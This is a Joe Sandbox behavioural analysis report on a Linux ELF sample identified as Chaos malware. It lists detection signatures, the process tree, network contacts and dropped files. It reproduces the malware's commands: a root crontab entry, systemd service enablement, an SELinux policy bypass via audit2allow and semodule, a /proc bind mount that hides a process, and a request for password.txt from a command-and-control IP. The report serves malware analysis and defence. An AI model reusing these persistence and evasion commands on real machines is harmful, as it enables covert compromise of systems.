Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
linux_386.elf

Overview

General Information

Sample name:linux_386.elf
Analysis ID:1543426
MD5:4b53bd2b79fc8f18d1a5e591358bcfb9
SHA1:4cde3dce676fb3a040472458c807b945d8ffefd8
SHA256:30523d9f0e7898f89538e2babd0e305b4e25b06521418e299e4e983c8597b558
Tags:elfuser-abuse_ch
Infos:

Detection

Chaos
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Chaos
Drops files in suspicious directories
Machine Learning detection for sample
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1543426
Start date and time:2024-10-27 20:37:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 13s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:linux_386.elf
Detection:MAL
Classification:mal80.spre.troj.evad.linELF@0/17@2/0
  • Report size exceeded maximum capacity and may have missing behavior information.
  • VT rate limit hit for: linux_386.elf
Command:/tmp/linux_386.elf
PID:6238
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • linux_386.elf (PID: 6238, Parent: 6162, MD5: 4b53bd2b79fc8f18d1a5e591358bcfb9) Arguments: /tmp/linux_386.elf
    • bash (PID: 6243, Parent: 6238, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32678&
      • bash New Fork (PID: 6250, Parent: 6243)
      • 32678 (PID: 6250, Parent: 1860, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 6263, Parent: 6250)
        • sleep (PID: 6263, Parent: 6250, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
    • service (PID: 6244, Parent: 6238, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 6254, Parent: 6244)
      • basename (PID: 6254, Parent: 6244, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 6262, Parent: 6244)
      • basename (PID: 6262, Parent: 6244, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 6264, Parent: 6244)
      • systemctl (PID: 6264, Parent: 6244, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 6266, Parent: 6244)
        • service New Fork (PID: 6267, Parent: 6266)
        • systemctl (PID: 6267, Parent: 6266, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 6268, Parent: 6266)
        • sed (PID: 6268, Parent: 6266, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 6244, Parent: 1860, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • linux_386.elf (PID: 6245, Parent: 6238, MD5: 4b53bd2b79fc8f18d1a5e591358bcfb9) Arguments: /tmp/linux_386.elf
      • update-rc.d (PID: 6261, Parent: 6245, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d linux_kill defaults
        • systemctl (PID: 6265, Parent: 6261, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • bash (PID: 6284, Parent: 6245, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
        • bash New Fork (PID: 6285, Parent: 6284)
        • systemctl (PID: 6285, Parent: 6284, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • bash New Fork (PID: 6299, Parent: 6284)
        • systemctl (PID: 6299, Parent: 6284, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable linux.service
        • bash New Fork (PID: 6303, Parent: 6284)
        • systemctl (PID: 6303, Parent: 6284, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start linux.service
        • bash New Fork (PID: 6354, Parent: 6284)
        • journalctl (PID: 6354, Parent: 6284, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager
      • bash (PID: 6373, Parent: 6245, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'System.img.conf' --raw | audit2allow -M my-Systemimgconf;semodule -X 300 -i my-Systemimgconf.pp"
        • bash New Fork (PID: 6374, Parent: 6373)
        • bash New Fork (PID: 6375, Parent: 6373)
        • bash New Fork (PID: 6376, Parent: 6373)
      • bash (PID: 6399, Parent: 6245, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash -c "echo \"*/1 * * * * root /.img \" >> /etc/crontab"
      • renice (PID: 6443, Parent: 6245, MD5: 3686c936ed1df483498266a36871cb5b) Arguments: renice -20 6245
      • mount (PID: 6444, Parent: 6245, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/6245
      • service (PID: 6466, Parent: 6245, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start
        • service New Fork (PID: 6467, Parent: 6466)
        • basename (PID: 6467, Parent: 6466, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6468, Parent: 6466)
        • basename (PID: 6468, Parent: 6466, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 6469, Parent: 6466)
        • systemctl (PID: 6469, Parent: 6466, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 6511, Parent: 6466)
          • service New Fork (PID: 6512, Parent: 6511)
          • systemctl (PID: 6512, Parent: 6511, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 6513, Parent: 6511)
          • sed (PID: 6513, Parent: 6511, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 6466, Parent: 6245, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service
      • systemctl (PID: 6592, Parent: 6245, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
  • systemd New Fork (PID: 6270, Parent: 6269)
  • snapd-env-generator (PID: 6270, Parent: 6269, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6297, Parent: 6296)
  • snapd-env-generator (PID: 6297, Parent: 6296, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6301, Parent: 6300)
  • snapd-env-generator (PID: 6301, Parent: 6300, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6305, Parent: 1)
  • System.img.config (PID: 6305, Parent: 1, MD5: 4b53bd2b79fc8f18d1a5e591358bcfb9) Arguments: /boot/System.img.config
    • pkill (PID: 6317, Parent: 6305, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
    • sh (PID: 6346, Parent: 6305, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
      • sh New Fork (PID: 6349, Parent: 6346)
      • 32678 (PID: 6349, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 6362, Parent: 6349)
        • sleep (PID: 6362, Parent: 6349, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
        • 32678 New Fork (PID: 6710, Parent: 6349)
        • id.services.conf (PID: 6710, Parent: 6349, MD5: 4b53bd2b79fc8f18d1a5e591358bcfb9) Arguments: /etc/id.services.conf
          • pkill (PID: 6714, Parent: 6710, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
          • sh (PID: 6715, Parent: 6710, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
            • sh New Fork (PID: 6717, Parent: 6715)
            • 32678 (PID: 6717, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
              • 32678 New Fork (PID: 6727, Parent: 6717)
              • sleep (PID: 6727, Parent: 6717, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
          • service (PID: 6716, Parent: 6710, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
            • service New Fork (PID: 6723, Parent: 6716)
            • basename (PID: 6723, Parent: 6716, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 6728, Parent: 6716)
            • basename (PID: 6728, Parent: 6716, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 6729, Parent: 6716)
            • systemctl (PID: 6729, Parent: 6716, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 6730, Parent: 6716)
              • service New Fork (PID: 6731, Parent: 6730)
              • systemctl (PID: 6731, Parent: 6730, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 6732, Parent: 6730)
              • sed (PID: 6732, Parent: 6730, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
          • systemctl (PID: 6716, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
          • id.services.conf (PID: 6718, Parent: 6710, MD5: 4b53bd2b79fc8f18d1a5e591358bcfb9) Arguments: /etc/id.services.conf
    • service (PID: 6347, Parent: 6305, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 6358, Parent: 6347)
      • basename (PID: 6358, Parent: 6347, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 6363, Parent: 6347)
      • basename (PID: 6363, Parent: 6347, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 6364, Parent: 6347)
      • systemctl (PID: 6364, Parent: 6347, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 6365, Parent: 6347)
        • service New Fork (PID: 6366, Parent: 6365)
        • systemctl (PID: 6366, Parent: 6365, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 6367, Parent: 6365)
        • sed (PID: 6367, Parent: 6365, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 6347, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • System.img.config (PID: 6348, Parent: 6305, MD5: 4b53bd2b79fc8f18d1a5e591358bcfb9) Arguments: /boot/System.img.config
  • sshd New Fork (PID: 6368, Parent: 936)
  • sshd (PID: 6368, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • sshd New Fork (PID: 6372, Parent: 936)
  • sshd (PID: 6372, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 6377, Parent: 6372)
  • udisksd New Fork (PID: 6456, Parent: 799)
  • dumpe2fs (PID: 6456, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • sshd New Fork (PID: 6543, Parent: 936)
  • sshd (PID: 6543, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 6551, Parent: 6543)
  • systemd New Fork (PID: 6582, Parent: 1)
  • cron (PID: 6582, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 6667, Parent: 6582)
      • cron New Fork (PID: 6674, Parent: 6667)
      • sh (PID: 6674, Parent: 6667, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.img "
        • sh New Fork (PID: 6676, Parent: 6674)
    • cron New Fork (PID: 6673, Parent: 6582)
      • cron New Fork (PID: 6681, Parent: 6673)
      • sh (PID: 6681, Parent: 6673, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c " [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi"
  • systemd New Fork (PID: 6682, Parent: 1)
  • cron (PID: 6682, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
ChaosMulti-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos
SourceRuleDescriptionAuthorStrings
linux_386.elfJoeSecurity_ChaosGoYara detected ChaosJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: linux_386.elfReversingLabs: Detection: 55%
    Source: linux_386.elfJoe Sandbox ML: detected
    Source: /usr/bin/pkill (PID: 6317)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/pkill (PID: 6714)Reads CPU info from /sys: /sys/devices/system/cpu/online

    Networking

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 53978
    Source: unknownNetwork traffic detected: HTTP traffic on port 53982 -> 808
    Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 53982
    Source: global trafficTCP traffic: 192.168.2.23:53978 -> 154.12.82.11:808
    Source: /tmp/linux_386.elf (PID: 6245)Reads hosts file: /etc/hostsJump to behavior
    Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
    Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
    Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: unknownTCP traffic detected without corresponding DNS query: 154.12.82.11
    Source: global trafficHTTP traffic detected: GET /password.txt HTTP/1.1Host: 154.12.82.11:808User-Agent: Go-http-client/1.1Accept-Encoding: gzip
    Source: linux_386.elfString found in binary or memory: http2: Transport conn %p received error from processing frame %v: %vhttp2: Transport received unsolicited DATA frame; closing connectionhttp: message cannot contain multiple Content-Length headers; got %qpadding bytes must all be zeros unless AllowIllegalWrites is enabledreflect: reflect.Value.UnsafePointer on an invalid notinheap pointerhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)tls: handshake message of length %d bytes exceeds maximum of %d bytestls: peer doesn't support the certificate custom signature algorithmsbytes.Buffer: UnreadByte: previous operation was not a successful readcannot convert slice with length %y to pointer to array with length %xgot %s for stream %d; expected CONTINUATION following %s for stream %dx509: PKCS#8 wrapping contained private key with unknown algorithm: %vx509: certificate relies on legacy Common Name field, use SANs insteadMozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)Sogou Pic Spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm#07)Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)dynamic table size update MUST occur at the beginning of a header blockssh: no common algorithm for %s; client offered: %v, server offered: %vtls: peer doesn't support any of the certificate's signature algorithmstoo many concurrent operations on a single file or socket (max 1048575)x509: issuer has name constraints but leaf doesn't have a SAN extensionMozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)tls: server's certificate contains an unsupported type of public key: %Ttls: received unexpected handshake message of type %T when waiting for %T91289437fa036b34da55d57af6192768c27bd433fa012169d626d934e0051b24dd67dd3cf49d7cc827bc012d259d7ac226e70829239d7ac226e7082968de60d520eb433722c07fd236f6crypto/elliptic: internal error: Unmarshal rejected a valid point encodingmalformed response from server: malformed non-numeric status pseudo headernet/http: server replied with more than declared Content-Length; truncatedtls: certificate RSA key size too small for supported signature algorithmsUnsolicited response received on idle HTTP channel starting with %q; err=%vtls: internal error: attempted to read record with pending application datatls: failed to send closeNotify alert (but connection was closed anyway): %wtls: server certificate contains incorrect key type for selected ciphersuite((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}MapIter.Next called on an iterator that does not have an associated map Valuecrypto/tls: ExportKeyingMaterial is unavailable when renegotiation is enabled115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951ssh: internal error: algorithmSignerWrapper invoked with non-default algorithmssh: unable to authenticate, attempted methods %v, no supported methods remainx509: signature check attempt
    Source: linux_386.elfString found in binary or memory: http: RoundTripper implementation (%T) returned a nil *Response with a nil errortls: either ServerName or InsecureSkipVerify must be specified in the tls.Configx509: invalid signature: parent certificate cannot sign this kind of certificaterefusing to use HTTP_PROXY value in CGI environment; see golang.org/s/cgihttpproxyx509: a root or intermediate certificate is not authorized to sign for this name: (possibly because of %q while trying to verify candidate authority certificate %q)Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)x509: issuer has name constraints but leaf contains unknown or unconstrained name: tls: downgrade attempt detected, possibly due to a MitM attack or a broken middleboxx509: signature algorithm specifies an %s public key, but have public key of type %Treflect.Value.Interface: cannot return value obtained from unexported field or methodx509: failed to parse private key (use ParseECPrivateKey instead for this key format)Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/;)reflect: New of type that may not be allocated in heap (possibly undefined cgo C type)x509: a root or intermediate certificate is not authorized for an extended key usage: fxfzUc6gtMGc/i26ld3KydGKy1k7QqyMMyxjbU1Rlk+F9LQxnaTeCHGHsDUpaBeOWDeY6l+2kHlB7EWTLcGwfg==whv+Kf1cEtOXzr+zuvmef2as0WfbUDm8l2LMWBMel10NDnbShg9CsMUt327VJhOTbXLoPYJVTKy8MBPCVwoT8A==x509: failed to parse private key (use ParsePKCS1PrivateKey instead for this key format)x509: failed to parse private key (use ParsePKCS8PrivateKey instead for this key format)Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)http2: server sent GOAWAY and closed the connection; LastStreamID=%v, ErrCode=%v, debug=%qapplication/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5tls: handshake hash for a client certificate requested after discarding the handshake buffertls: unsupported certificate: private key is *ed25519.PrivateKey, expected ed25519.PrivateKey3617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5faa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760ab7b3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120314088f5013875ac656398d8a2ed19d2a85c8edd3ec2aefhttp: RoundTripper implementation (%T) returned a *Response with content length %d but a nil BodyNoClientCertRequestClientCertRequireAnyClientCertVerifyClientCertIfGivenRequireAndVerifyClientCertcipher: the nonce can't have zero length, or the security of the key will be immediately compromised1.0.3<<RMS>> equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: linux_386.elfString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)x509:
    Source: linux_386.elfString found in binary or memory: http://search.msn.com/msnbot.htm
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)000102030405060708091011121314151617181920212223242526272829
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)Mozilla/5.0
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)http2:
    Source: linux_386.elfString found in binary or memory: http://www.entireweb.com/about/search_tech/speedy_spider/)text/html
    Source: linux_386.elfString found in binary or memory: http://www.google.com/mobile/adsbot.html)
    Source: linux_386.elfString found in binary or memory: http://www.haosou.com/help/help_3_2.htmlMozilla/5.0
    Source: linux_386.elfString found in binary or memory: http://www.huaweisymantec.com/cn/IRL/spider)Mozilla/5.0
    Source: linux_386.elfString found in binary or memory: http://www.youdao.com/help/webmaster/spider/;)reflect:
    Source: linux_386.elfString found in binary or memory: http://yandex.com/bots)http:
    Source: linux_386.elfString found in binary or memory: https://search.yahoo.com/search?p=illegal
    Source: linux_386.elfString found in binary or memory: https://www.baidu.com/s?wd=insufficient
    Source: linux_386.elfString found in binary or memory: https://www.so.com/s?q=index
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /usr/bin/pkill (PID: 6317)SIGKILL sent: pid: 6250, result: successful
    Source: /usr/bin/pkill (PID: 6714)SIGKILL sent: pid: 6349, result: successful
    Source: classification engineClassification label: mal80.spre.troj.evad.linELF@0/17@2/0
    Source: ELF file sectionSubmission: linux_386.elf

    Persistence and Installation Behavior

    barindex
    Source: /tmp/linux_386.elf (PID: 6245)File: /etc/profile.d/bash_config.shJump to behavior
    Source: /usr/bin/bash (PID: 6399)File: /etc/crontab
    Source: /tmp/linux_386.elf (PID: 6238)File: /etc/id.services.conf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6238)File: /etc/32678 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /etc/profile.d/bash_config (bits: - usr: rx grp: rx all: rwx)Jump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /dev/.oldJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /dev/.imgJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File: /.imgJump to behavior
    Source: /etc/id.services.conf (PID: 6718)File: /dev/.old
    Source: /etc/id.services.conf (PID: 6718)File: /dev/.img
    Source: /boot/System.img.config (PID: 6348)File: /dev/.old
    Source: /boot/System.img.config (PID: 6348)File: /dev/.img
    Source: /boot/System.img.config (PID: 6348)Empty hidden file: /dev/.old
    Source: /boot/System.img.config (PID: 6348)Empty hidden file: /dev/.img
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/6592/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/6592/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/6354/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/6354/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/6354/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/6354/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/6354/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/6354/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
    Source: /tmp/linux_386.elf (PID: 6245)File opened: /proc/1582/statJump to behavior
